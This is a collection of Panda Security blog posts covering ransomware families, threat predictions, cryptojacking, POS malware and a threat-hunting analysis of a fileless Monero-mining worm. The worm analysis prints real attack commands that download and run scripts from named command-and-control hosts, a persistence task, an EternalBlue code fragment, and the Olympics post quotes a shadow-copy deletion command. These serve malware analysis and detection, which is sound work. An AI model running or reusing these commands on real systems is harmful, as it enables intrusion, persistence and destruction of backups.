If we take a look back, it is clear that one of the main features of ransomware as a threat is that it is continually reinventing itself, persisting in time and effectiveness. These types of attacks have evolved greatly since they first emerged, and today there are many different and varied families in existence.

This also implies a greater effort from cyber-criminals, as it involves the application of more advanced and complex techniques. In turn, this means an increase in the sophistication, propagation, and persistence of the threat. Sodinokibi, aka REvil, is one such example, having infected devices around the globe in a startlingly short period of time.

Download here the Ransomware Report

Sodinokibi and doxing

In late 2019, the beginning of a trend was observed in ransomware attacks which has become an established practice today: the operators of diverse ransomware families, in addition to hijacking files, are threatening to divulge confidential or compromising information.

The technique was first used with the Maze ransomware, and a month later the operators behind other families of ransomware – no doubt motivated by its effectiveness – adopted this strategy in cases where victims were reluctant to pay to recover encrypted files. Such was the case with the Sodinokibi, DoppelPaymer, RobinHood, and Nemty ransomware threats.

Main features

In the case of Sodinokibi (aka REvil), one notable feature is its great ability to evade detection by antivirus systems and the numerous measures it implements to achieve this. We have also noted how this ransomware exploits a vulnerability in Oracle WebLogic servers. Although this is a standout feature in Sodinokibi, like many other ransomware families, it operates as RaaS (Ransomware as a Service), meaning that it not only generates money directly through extortion, but also through the sale of kits that allow attackers to create and distribute their own ransomware.

These features combined are what made Sodinokibi the most lucrative ransomware in the final quarter of last year, despite having first been detected earlier in the year, generating almost eight per cent more revenue than the Ryuk ransomware.

Infection vector

The most frequent way for Sodinokibi to reach devices is through a malicious email in a phishing campaign. The email contains a link prompting recipients to download a zip file containing the Sodinokibi loader. Attackers distribute malware in this way as it makes it easier to reach the victim and also because distributing the malware in a zip file helps evade antivirus protection systems.

The zip file normally contains an obfuscated JavaScript file such as the one we analyzed in the report.

Distribution

The geographical scope of Sodinokibi has been diverse, and incidents have been recorded in numerous countries around the world this year. Nevertheless, attacks have largely been focused on Europe, the USA, and India.

Advanced cyber-security to combat ransomware

We’ve witnessed how ransomware attacks have switched from targeting as many users as possible to focusing attacks on specific victims in order to improve financial returns. It is important, in the face of these new cyber-crime tactics, not to succumb and pay the ransom to these criminals, as there is no guarantee in any case that it will be possible to decrypt and retrieve the information even after handing over the money. Neither is it certain that any compromising information will not be made public, or used for any other malicious purposes.

To prevent your company from having to deal with such situations, there are advanced endpoint protection systems, such as Panda Adaptive Defense 360, with advanced EDR capabilities, process monitoring in all network endpoints, and a service for classifying 100 per cent of these processes. The truth is that ransomware is a very real threat and one that is difficult to counter if you don’t have the right protection or follow the proper guidelines.

Be prepared and protect your systems with Panda Adaptive Defense 360 which, thanks to the Zero Trust model, provides a greater level of visibility and control to boost prevention, detection, and response to any threat, including ransomware such as Sodinokibi.

Find out more about the technical details of Sodinokibi in our PandaLabs report on this ransomware:

Download here the Ransomware Report

The post An analysis of Sodinikibi: The persistent ransomware as a service appeared first on Panda Security Mediacenter.

The cybersecurity landscape never stops evolving, and both the scope and velocity of this evolution are increasing and becoming more unpredictable. Antivirus solutions based on specific signatures and generic and heuristic detection are not enough to be able to deal with the flood of new, highly sophisticated malware variants, which continue to infect the systems of companies with lower levels of protection.

Fortunately, as cyberthreats evolve, so too does cybersecurity technology. IT security solutions employ a range of capacities designed to keep networks from being infiltrated, to detect and stop suspicious behavior, and get ahead of future intrusions. In a new landscape with endless unknowns, what should cybersecurity look like in a changing environment?

At PandaLabs, Panda Security’s security laboratory, we registered and analyzed 14.9 million malware events in 2019, stopping 7.9 million potentially Unwanted Programs (PUPs), as well as 76,000 alerts for exploits that intended to leverage vulnerabilities in applications, networks, or hardware in order to compile the main cybersecurity threats and trends in our report. Discover the leading cybercriminal techniques and what you can do to stop them.

Download the report

This data reinforces the idea behind our cybersecurity model: reactive security is no longer appropriate. There are too many threats and too many attack vectors in any IT environment, all of which can cause a breach. Today, cybersecurity solutions must be predictive, proactive, and prepared to respond to any incident that could arise. 

The main cybersecurity technology trends in Q1 2020

Cybercriminals are increasingly stealthy, eagerly taking advantage of errors, hiding their movements, and getting around detection technologies, especially in the cloud, through mobile applications, and on networks.

Cybercriminals are essentially after three things:

• Financial gain, using ransomware to extort money from their victims in return for recovering their stolen information
• Data, which can be sold on the dark web
• Control of infrastructure, networks, or other important systems. This access is sold to influential entities, such as nation states, political groups, paramilitary factions, and others.

How do they manage to do this? Some of the main cyberthreats of the start of this year are:

• Ransomware, the notorious malware variant, is still persistent. A single click is enough to paralyze and entire network, doing away with security controls and backups to make as big an impact as possible in the shortest possible time. Any kind of organization can fall victim to ransomware, as we saw just a few months ago in the wave of attacks that hit public and private institutions around the world.
• Fileless attacks are a growing concern: they are more difficult to detect and make it easier for cybercriminals to attack stealthily. Cybercriminals are changing how they attack, and their strategies no longer necessarily need a specific file to break onto a network, as we have analyzed in the Living-off-the-Land attacks that we registered.
• Proactive threat hunting is now an essential solution for recognizing abnormal and malicious behaviors that exploit trusted applications.

• Cybersecurity solutions can no longer be based on one single technology: they require an approach based on layered technology, combined with a zero-trust posture to stop possible security breaches. These layered technologies provide an unparalleled level of control, visibility, and flexibility. This is what is needed in the dynamic war against unknown attackers. Certified solutions such as Panda Adaptive Defense determine whether devices are running trusted endpoint security applications.

There are increasing numbers of interconnected endpoints, from workstations, to laptops and servers. All of these endpoints require an approach that combines advanced endpoint protection (EPP) and endpoint detection and response (EDR), based on a zero-trust security posture, backed by artificial intelligence. The application of these technologies to cybersecurity is a necessary change in how the industry addresses the problem of cyberthreats. It emphasizes the idea of goodware—known, registered, and classified processes that can run on the endpoint—ensuring that unknown and malicious processes cannot run.

Conclusions: the advantages of multilayer protection

The latest threats require a cybersecurity that has evolved from single technology solutions to multi-layer solutions that employ behavior-based monitoring, among other features, to eliminate persistent threats, fileless attacks, and other malicious activity.

This has resulted in a layered technology model combined with a zero-trust security posture that doesn’t let any unknown processes run on any endpoints on the network. This technology provides two pain advantages:

• Security teams do not have re run in-depth analysis of alerts. Having to run such analyses manually could mean having to employ more staff or leaving alerts unverified, leading to elevated security risks.
• If a security team has to verify these alerts, their MTTD and MTTR (mean time to detect/respond) will be higher than ours. Delaying a decision even by a few minutes could have serious negative repercussions on the potential affects of an attacker or a data breach.

Discover all the advantages of the only solution on the market that classifies 100% of running processes on computers. You can also find out the countries that have been worse hit by different malware families, as well as other data analyzed by PandaLabs here:

Download the report

The post Panda Security launches its Threat Insights Report 2020 appeared first on Panda Security Mediacenter.

In 2019, ransomware was one of the key players of cybercrime. Companies and official organizations all around the world were hit by cyberattacks that used this kind of malware to encrypt their files and demand a ransom. These waves of ransomware used a range of variants to carry out the attacks. However, there is one variant that was used then, and that is still seen today, that made a name for itself because of how often it was used: Ryuk.

Ryuk is one of the most notorious ransomware variants of the last few years. Since it first appeared in summer 2018, it has garnered an impressive list of victims, especially in business environments, which are the primary focus of its attacks.

In mid-2019, a large number of important Spanish companies suffered serious attacks that made use of Ryuk to encrypt their systems. The companies affected were in a range of sectors and varied in size. They included Everis and several municipal governments.

Spain is not the only country to have suffered at the hands of this ransomware; the countries that have been worst hit by Ryuk are Germany, China, Algeria, and India. Over the last three years, Ryuk has affected millions of users, compromising vast amounts of data and causing significant economic losses.

How Ryuk works

Like other pieces of ransomware, once Ryuk has finished encrypting its victims’ files, it leaves a ransom note stating that, in order to recover their files, they need to make a payment in bitcoins to the address indicated in the note.

Download The Report

In the sample analyzed by Panda Security, Ryuk made its way on the system via a remote connection made in an RDP attack. The bad actor managed to log in remotely. Once logged in, he created an executable with the sample.

Ryuk, like other pieces of malware, tries to stay on the system for as long as possible. One of the ways that it tries to do so is by creating executables and launching them in secret. To be able to encrypt its victim’s files, it also needs to have privileges. Generally speaking, Ryuk starts with a lateral movement or is launched by another piece of malware, such as Emotet or Trickbot. These are responsible for escalating privileges before granting them to the ransomware.

How to protect yourself against Ryuk

Ryuk has a litany of tricks to gain entry, gain persistence, and encrypt the its victims’ files. As is the case with all ransomware, if you don’t have the proper protection and if you don’t follow the appropriate guidelines, this threat can be hard to contain.

Panda Security deals with this problem with a combination of advanced endpoint protection in its solution Panda Adaptive Defense, with its EDR capabilities, its monitoring of all endpoints on the system, and its 100% classification service. It is based on a zero-trust approach: any unknown process or application is blocked until it can be analyzed. This way, it is able to stop any threat before it can run, even the most advanced attacks, like Ryuk.

Find out more technical details about Ryuk in our report on this ransomware, written by PandaLabs:

Download The Report

The post Ryuk: How the ransomware that attacks businesses works appeared first on Panda Security Mediacenter.

2017 was the year when the word ransomware stopped being a term exclusive to cybersecurity experts and IT departments. The enormous media attention that attacks such as WannaCry and Petya/GoldenEye received turned this type of threat into one of the key trends for businesses last year. However, highly publicized events must never serve as a risk indicator, nor influence on any security related decision.

Download the report

This year, the constant evolution of cybercriminality hasn’t taken a break. Cybercriminals have already begun to change their tactics: instead of attention-grabbing, showy attacks like those we saw last year, they are opting for sneakier tactics such as cryptojacking.

Cryptojacking, one of 2018’s booming trends, is the unauthorized use of a user’s devices to mine cryptocurrencies, and can get in via phishing emails, malicious URLs, or through vulnerabilities. Its aim is to go unnoticed for as long as possible, and thus fully exploit its victim’s processing power.

The year of personal data

One new story that has affected many cybersecurity professionals is the definitive implementation of the GDPR in May this year, something that had repercussions in nearly the whole world.

And the fact is that this new regulation has coincided with some of the most massive data breaches in history: Marriott International, Exactis, or the notorious Facebook and Cambridge Analytica case.

What can we expect to see next year?

One of the leading trends in cybercriminality in 2019 will be live hacking. Although “traditional” types of malware, such as Trojans or worms, are still being used frequently by attackers, new malwareless attack techniques will grow at a faster rate. This can be put down to an increased difficulty in detecting them on the one hand, and on the other hand, to the increased cyberoffensive capacity in the world, both of states, and of criminal gangs, both state sponsored and unaffiliated.

In 2018, nation states have played a more significant role in the digital realm, as a consequence of the more protectionist positions in the western world (the United States and the United Kingdom), the reactions of other powers (mainly Russia and China), and the increasing climate of mutual distrust among them. One compelling prediction suggests that the concept of digital sovereignty will also spread to security in 2019, especially in Europe, moving towards a European digital sovereignty.

Find out all the main threat data from this year, together with the most important news, and all our predictions for 2019 in our PandaLabs Annual Report.

Download the report

The post PandaLabs presents its cybersecurity predictions for 2019 appeared first on Panda Security Mediacenter.

In 2018, cryptojacking has become the leading threat to the security of electronic devices. However, unlike other cybercriminal trends, it has done so without making headlines around the world. It could even be the case that you’re being affected by it right now, without even noticing. But with a 4,000% at the start of the year, it is obvious that this is a serious threat, no matter now sneaky it is.

To keep cryptojacking from undermining your company’s reputation and putting you business’s continuity at risk, Panda Security presents the report, Cryptojacking: A hidden cost:

Download the whitepaper

What is it?

Cryptojacking is the unauthorized use of a user’s device to mine cryptocurrencies: attackers use malware to get onto computers, tablets or smartphones, and exploit part of their processing power to mine cryptocurrencies.

What effects does it have?

This attack has multiple negative consequences, which can include an extreme rise in your electricity bill, a serious slowdown in your computers, and even physical damage to devices.

To protect you from this threat, here at Panda Security we have the following tips:

• Carry out periodical risk evaluations to identify vulnerabilities.
• Analyze resources to make sure there is no unusual activity.
• Thoroughly investigating any spikes in IT problems related to unusual CPU performance
• Careful with your browser. If you suspect that cryptojacking is getting in via websites, install plugins to block these sites on your browser.
• Regularly update all the company’s devices and systems.
• Use an advanced cybersecurity solution that provides key characteristics such as detailed visibility of the activity on all endpoints, and which allows you to control all running processes. This is exactly what Panda Adaptive Defense does.

Find out more in the report A Hidden Cost, and don’t become the next victim.

Download the whitepaper

The post Cryptojacking: A hidden cost for your company appeared first on Panda Security Mediacenter.

On Monday, while spectators were being dazzled by the opening ceremony of the 2018 Winter Olympics, held in Pyeongchang, the Olympics organizing committee was busy dealing with a cyberattack.

The decline in new malware samples and the professionalization of attacks on networks are setting new standards in cybersecurity. In this case, we’re dealing with a targeted attack and an act of sabotage, in which hackers sought to cause chaos during the opening ceremony. It affected some television and internet services before the ceremony, but was not successful in stealing data from servers.

Researchers from Cisco’s Talos division also added that the malware’s purpose was not theft, but rather destruction.

GoldDragoN, the latest Russian hack?

With the focus usually centered on maximum profit, there’s been an increase in the number of advanced infiltrations using sharp new tactics, such as malwareless attacks and the abuse of non-malicious tools.

PandaLabs explains that by not using malware, which is easily detected by advanced cybersecurity tools, attackers assume the identity of the administrator after having obtained  their network credentials. They warn that the techniques used by cybercriminals to attack without using malware can be highly varied, taking advantage of all kinds of non-malicious tools that are part of the day to day of IT managers.

In this case, the attack did in fact use malware (named GoldDragon), but to carry out certain actions it used non-malicious tools such as PsExec or the CMD itself. In this way, it was able to execute processes on other computers connected to the network without raising suspicion and without using a version modified by the attackers, but rather the official version.

To carry out its destructive actions, it launched system commands from a command window (cmd). Instructions looked like this:

C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet

Here, the vssadmin.exe is used to silently erase the backup copies created by the operating system.

Everything seems to indicate that the attack came from Russia. Ukrainian intelligence and a CIA report linked NotPetya and BadRabbit to Russian intelligence, and in the case of GoldDragon (also called Olympic Destroyer), all signs point to a more refined version of BadRabbit.

System tools as a new attack vector

Monitoring the execution of all processes on company workstations and servers is essential to avoiding close calls like the one we witnessed in this year’s winter olympics.

Traditional antiviruses are not able to detect these types of attack, nor to remediate them. However, Panda Adaptive Defense proposes a new security model based on the monitoring, control, and classification of behavior and the nature application in execution to offer robust and complete protection.

PandaLabs recommends the use of advanced cybersecurity solutions such as Panda Adaptive Defense, which also allow the client’s existing infrastructure to coexist with traditional antivirus systems and integrate with existing SIEM solutions.

The post Cyber Sabotage at the Winter Olympics appeared first on Panda Security Mediacenter.

The following is a compilation of all past PandaLabs reports. It is a complete record of the cybersecurity lab’s highlights.

2017

2016

2015

2014

2013

2012

2011

2010

The post Compilation of PandaLabs Reports appeared first on Panda Security Mediacenter.

Today, more malware samples are created in just a few hours than in the entire twentieth century. The targets have changed, the techniques have become more sophisticated, the attack vectors have multiplied, and the tools are more precisely designed. Attackers are meticulously studying their victims to adapt their strategy and achieve the greatest possible impact.

Their efficiency, effectiveness, and profitability are proven time and again, with up to 75 million distinct malware files created between the beginning of the year and October, which translates to 285,000 new samples detected every day by PandaLabs.

2017 Cybersecurity Trends

More than half of attacks are motivated by financial targets, while espionage is the second greatest motivating factor.

Stealth attacks with adaptive lateral movements are becoming all too common.

Malwareless attacks are increasingly favored by attackers. They prefer to remain invisible to traditional protection models, and do not require the victim’s interaction. These attacks can double profitability when optimally executed.

Tools for exploiting vulnerabilities have given rise to new attack vectors that require no human interaction.

The endpoint is the target. The perimeter has become blurred, mobility is the norm in any company, and corporate networks are therefore much more exposed.

Ex-employees attempted to extort their previous companies, initiating attacks from within the company.

There was a larger presence of organized cybercriminal groups, such as the Lazarus Group, attacking the media, the aerospace and financial sectors, as well as critical infrastructures in the US and elsewhere.

Cyberwarfare and cyber-armies: in a full on arms race in cyberspace, nations are creating cyber command centers to bolster defenses against attacks on companies and infrastructures.

Figures

In 2017, PandaLabs analyzed and neutralized a total of 75 million malware files, about 285,000 new samples a day.

One thing is clear: there are many more malware samples, and each of them is infecting fewer devices individually. Each malware sample will attack a minimum number of devices in order to lower the risk of being detected and thereby achieve its goal.

This is supported by the fact that of all the new malware (PE files) never seen before this year (15,107,232), only 99.10% have been seen only once; in other words, in 14,972,010 samples. If we look at the figures from the other end, we see that indeed an insignificant part of all the malware is truly widespread. We have only seen 989 malware files on more than 1,000 computers — 0.01%.

This confirms what we already knew: with a few exceptions — such as WannaCry or HackCCleaner — most malware changes every time it infects, so each copy has a very limited distribution.

Listen to the webinar given by Luis Corrons, Technical Director of PandaLabs:

Cybersecurity Predictions for 2018

Cyberwarefare and its consequences: Instead of an open war where the opposing sides are clearly identifiable, we are facing a guerrilla strategy with isolated attacks whose authors are never clear. Freelancers at the service of the highest bidder, false flag operations, and an increase in collateral victims of these attacks is what’s in store for 2018.

Malwareless hacking attacks: attacks that abuse non-malicious tools or compromised applications to carry out their efforts will increase.

Malware for mobile devices and the Internet of Things will continue to rise. In general, IoT devices are not targeted by cybercriminals as the ultimate goal. But when compromised, these devices increase the attack surface and are used as a gateway to the company’s network.

More advanced attacks and more ransomware can be expected in the coming year. These attacks promise a high return on their investment at a low level of risk.

Companies will spearhead awareness-building initiatives for attacks: for the first time in history, the public will be aware of attacks that happen and are in many cases subsequently covered up, thanks to the new GDPR legislation.

Social networks and propaganda: there will be an increase in fake news due to the ability of these platforms to influence public opinion. Facebook, the largest social network in the world, is already taking action on the matter. If it is discovered that a Facebook page repeatedly distributes false news, it will prohibit it from being publicized on the social network.

Cryptocurrency: the use of cryptocurrencies will continue to grow, and all the cybercrime that surrounds it, such as infecting computers with cryptocurrency mining software or the theft of user wallets, will follow suit.

Conclusions

Security update protocols should be a priority at all companies. Cases such as WannaCry or Equifax reaffirm this, as every day that passes without patching a vulnerable system puts the company at risk, as well as the integrity of its data, including that of customers and suppliers. Production can be endangered and incur millions in losses.

Countries are investing more and more in defensive and offensive capabilities, with a focus on critical infrastructures.

2018 augurs a more dangerous situation. For many professionals, a change of mentality (and strategy) will be necessary to achieve the highest levels of security and protect the assets of their companies’ networks.

Both in business and at home, training and awareness are key. It follows that cybersecurity, often forgotten by management, will require a greater investment.

Having in-depth knowledge of attacks and what they consist of should be the basis for a good defensive strategy. Machine Learning tools and the investigations of Threat Hunting teams are essential to avoid future intrusions.

Signature files no longer work and the figures speak for themselves: more than 99% of all malware never appears again anywhere else.

There is a problem of focus: solutions that remain focused on fighting against malware (the majority of those available on the market) are doomed to become extinct if they do not change their strategy.

And of course, we can’t forget international cooperation and the creation of common legislative frameworks such as the GDPR. Having political and economic support and a plan of action will make it possible to benefit from the latest technological advances in the safest manner.

In the PandaLabs Annual Report, you can learn about real cases, review the most discussed attacks of 2017, and read more about what lies ahead in 2018.

The post PandaLabs Reveals its Predictions for Cybersecurity Trends in 2018 appeared first on Panda Security Mediacenter.

The danger of having the data of thousands of credit cards recorded makes Point of Sale (POS) terminals a critical system, as well as an increasingly sought-after target of cybercrime. Attacking these devices anonymously online is relatively straightforward, and selling the data on the black market is profitable.

We’ve recently detected infections at a significant number of bars and restaurants in the United States whose POS terminals were attacked by two variants of credit card theft malware.

The malware samples that we’ll be analyzing are the following:

File name                          MD5

Epson.exe                           69E361AC1C3F7BCCE844DE43310E5259

Wnhelp.exe                       D4A646841663AAC2C35AAB69BEB9CFB3

Epson.exe presents an invalid certificate:

Both samples were compiled with Microsoft Visual C ++ 8, and are not packaged or encrypted. Once the malware is executed in the system, it proceeds to analyze the different system processes in search of credit cards.

Here we can see how they go through the different processes looking only for those that can contain credit cards in memory:

In the case of the “Epson.exe” sample, it will search for credit cards in the following processes:

On the other hand, the “Wnhelp.exe” sample contains a list that is used to discard the processes to be analyzed. If the process name coincides with any item on the list, it will not be analyzed in the search for credit cards:

In both samples, once the process it wishes to analyze is obtained, whether because it was contained on the list – as with Epson.exe – or because it was discarded – as with Wnhelp.exe – it will create a new thread:

And will then proceed to analyze the memory using an algorithm specifically designed to check whether the found data is from credit cards:

The Wnhelp.exe sample is executed by the attackers with the command “install”, in such a way that it creates a service to ensure its persistence in the system:

The service is called “Windows Error Reporting Service Log”.

The sample Epson.exe works in the same way, although attackers can configure the name of the service as they want through parameters:

install [Service name] [Service description] [Third parameter]

Each variant connects to a different command and control (C&C) server:

They can then receive different orders from the attacker:

To connect the control panel, they use the following UserAgent:

“Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.152 Safari/537.22”

The communication is carried out by an SSL. The malware modifies the internet connection configuration to ignore unknown CAs (Certificate Authorities), thereby ensuring that it will be able to use its own certificate.

First it obtains the internet connection security flags through the InternetQueryOptionA API with the third argument set to the value INTERNET_OPTION_SECURITY_FLAGS (31). Once obtained, it carries out a binary OR with the flag SECURITY_FLAG_IGNORE_UNKNOWN_CA (100h).

Conclusion: How to Confront a POS Attack

Attacks on POS terminals are still very popular, especially in countries like the United States where the use of Chip & PIN is not mandatory. Many of these attacks target businesses that do not have specialized personnel in computer science, much less in security, an oversight that attackers can take advantage of.

POS terminals are computers that handle critical data and therefore must be fortified to the maximum in order to shield customer data from the inherent risks. Solutions such as Adaptive Defense 360 help to ensure that no malicious process is executed in these terminals. There is no need to hire a security specialist, because the solution includes Panda Security’s own technicians, who will be responsible for ensuring that everything all executed processes are safe.

The post Alina, the Latest POS Malware appeared first on Panda Security Mediacenter.

Mining cryptocurrencies like Bitcoin, Ethereum or Monero is nothing new. In fact, in recent years we have seen numerous attacks whose main objective is the installation of mining software. For example, it is worth remembering that before WannaCry, we had already seen attackers use the NSA EternalBlue exploit to infiltrate companies and install this type of software on their victims’ devices.

It’s safe to say that it is a booming business, as sophistication of the attacks continues to increase. A few days ago we detected a new worm that uses both hacking tools and scripts to spread through corporate networks and mine the Monero cryptocurrency in any network it makes its way into.

With Adaptive Defense, we monitor all running processes in real time on every computer where it is installed. When our Threat Hunting team observed the following command attempting to execute through one of the processes on one computer, alarms were raised:

cmd /v:on /c for /f “tokens=2 delims=.[” %i in (‘ver’) do (set a=%i)&if !a:~-1!==5 (@echo on error resume next>%windir%\11.vbs&@echo Set ox=CreateObject^(“MSXML2.XMLHTTP”^)>>%windir%\11.vbs&@echo ox.open “GET”,”http://stafftest.firewall-gateway.com:8000/info.vbs“,false>>%windir%\11.vbs&@echo ox.setRequestHeader “User-Agent”, “-“>>%windir%\11.vbs&@echo ox.send^(^)>>%windir%\11.vbs&@echo If ox.Status=200 Then>>%windir%\11.vbs&@echo Set oas=CreateObject^(“ADODB.Stream”^)>>%windir%\11.vbs&@echo oas.Open>>%windir%\11.vbs&@echo oas.Type=1 >>%windir%\11.vbs&@echo oas.Write ox.ResponseBody>>%windir%\11.vbs&@echo oas.SaveToFile “%windir%\info.vbs”,2 >>%windir%\11.vbs&@echo oas.Close>>%windir%\11.vbs&@echo End if>>%windir%\11.vbs&@echo Set os=CreateObject^(“WScript.Shell”^)>>%windir%\11.vbs&@echo os.Exec^(“cscript.exe %windir%\info.vbs”^)>>%windir%\11.vbs&cscript.exe %windir%\11.vbs) else (powershell -NoP -NonI -W Hidden “if((Get-WmiObject Win32_OperatingSystem).osarchitecture.contains(’64’)){IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.firewall-gateway.com:8000/info6.ps1′)}else{IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.firewall-gateway.com:8000/info3.ps1′)}“)

Analysis of Network Propagation

Soon after beginning our investigation from PandaLabs, we observed how the attackers, knowing that they’d been discovered, closed off command and control servers, but before they could we were able to download the following files:

• b6fcd1223719c8f6daf4ab7fbeb9a20a            ps1 ~4MB

• 27e4f61ee65668d4c9ab4d9bf5d0a9e7 vbs ~2MB

They are two highly obfuscated scripts. “Info6.ps1” loads a Mimikatz module (dll) in a reflectively (leaving the disk untouched) so that it can steal credentials. These credentials will be used later to move laterally on internal (unprotected) networks.

The script implements, in Powershell, the famous NetBios exploit, known as EternalBlue (MS17-010), so that it can proceed to infect other not-yet-patched Windows computers on the network.

$TARGET_HAL_HEAP_ADDR_x64 = 0xffffffffffd00010
$TARGET_HAL_HEAP_ADDR_x86 = 0xffdff000
[byte[]]$fakeSrvNetBufferNsa = @(0x00,0x10,0x01,0x00,0x00
[byte[]]$fakeSrvNetBufferX64 = @(0x00,0x10,0x01,0x00,0x00
$fakeSrvNetBuffer = $fakeSrvNetBufferNsa
[byte[]]$feaList=[byte[]](0x00,0x00,0x01,0x00)
$feaList += $ntfea[$NTFEA_SIZE]
$feaList +=0x00,0x00,0x8f,0x00+ $fakeSrvNetBuffer
$feaList +=0x12,0x34,0x78,0x56
[byte[]]$fake_recv_struct=@(0x00,0x00,0x00,0x00,0x00,0x00

At the same time it makes use of WMI to remotely execute commands. Once the passwords for a computer are obtained, we see the “wmiprvse.exe” process on that computer execute a command line similar to the following:

powershell.exe -NoP -NonI -W Hidden  -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4Ad…

If we decode the “base 64” of this command line, we obtain the script shown in Annex I.

Persistence in the System

Within one of the scripts, the following command can be found to achieve persistence in the system:

cmd /c echo powershell -nop “$a=([string](Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding ));if(($a -eq $null) -or (!($a.contains(‘SCM Event Filter’)))) {IEX(New-Object Net.WebClient).DownloadString(‘http://stafftest.spdns.eu:8000/mate6.ps1’)}” >%temp%\y1.bat && SCHTASKS /create /RU System /SC DAILY /TN yastcat /f /TR “%temp%\y1.bat” &&SCHTASKS /run /TN yastcat

As you can see, it programs a daily task that downloads and executes the “y1.bat” file.

Note that we do not have this file at our disposition, as the command and control servers are currently offline.

Infection Vector 

We still do not know the initial infection vector, since networks on which we detected and blocked the infection were in the process of deploying Adaptive Defense at that time and did not have the whole network protected with our advanced cybersecurity solution. For this reason, we have not been able to determine who the “patient zero” was and how it became compromised.

It could be a download/execution of a file/Trojan that initially activated the worm, or it could have been executed remotely using some exploit.

Command and Control Servers

From the “info6.ps1” script, we were able to obtain the following command and control servers.

• spdns.eu
• firewall-gateway.com
• 179.67.243
• 184.48.95

Note that on October 27, 2017, these servers ceased to be operative.

118.184.48.95

107.179.67.243

stafftest.spdns.eu

stafftest.firewall-gateway.com

IOCs

• exe ( Monero, MD5 2ad7a39b17d08b3a685d36a23bf8d196 )
• %windir%\11.vbs
• %windir%\info.vbs
• %windir%\info6.ps1
• dll
• dll
• Tarea programada “yastcat”
• spdns.eu
• firewall-gateway.com
• 179.67.243
• 184.48.95

Conclusion

Once again, we are witnessing the professionalization of increasingly advanced attacks. Even when it is only a matter of installing Monero miners (and we leave aside data theft, sabotage, or espionage), attackers are using advanced techniques and sharp tactics. The fact that it is a fileless attack makes it so that a majority of traditional antivirus solutions are barely able to counteract or even detect it, and its victims can only wait for the necessary signatures to be generated (the attack is fileless, but as we have seen at one point, both the scripts and the Monero client are downloaded).

But this only serves for this particular attack, and anything that varies even slightly will be useless, not to mention that only the end of the attack is detected, without seeing how it moves through the network and compromises computers.

Since Adaptive Defense not only classifies all running processes on every computer, we are able to monitor the entire network in real time, something which is becoming increasingly necessary as attackers resort to malwareless techniques in which they abuse legitimate system tools.

Among the events we monitor, we can find:

• Process creation and remote injection
• Creation, modification and opening of files
• Creation and modification of registry entries
• Network events (communication aperture, file download, etc.)
• Administrative events (creation of users, etc.)

We will keep you updated with any findings from our Threat Hunting, as well as the detection of any new attacks.

The post Threat Hunting, the Investigation of Fileless Malware Attacks appeared first on Panda Security Mediacenter.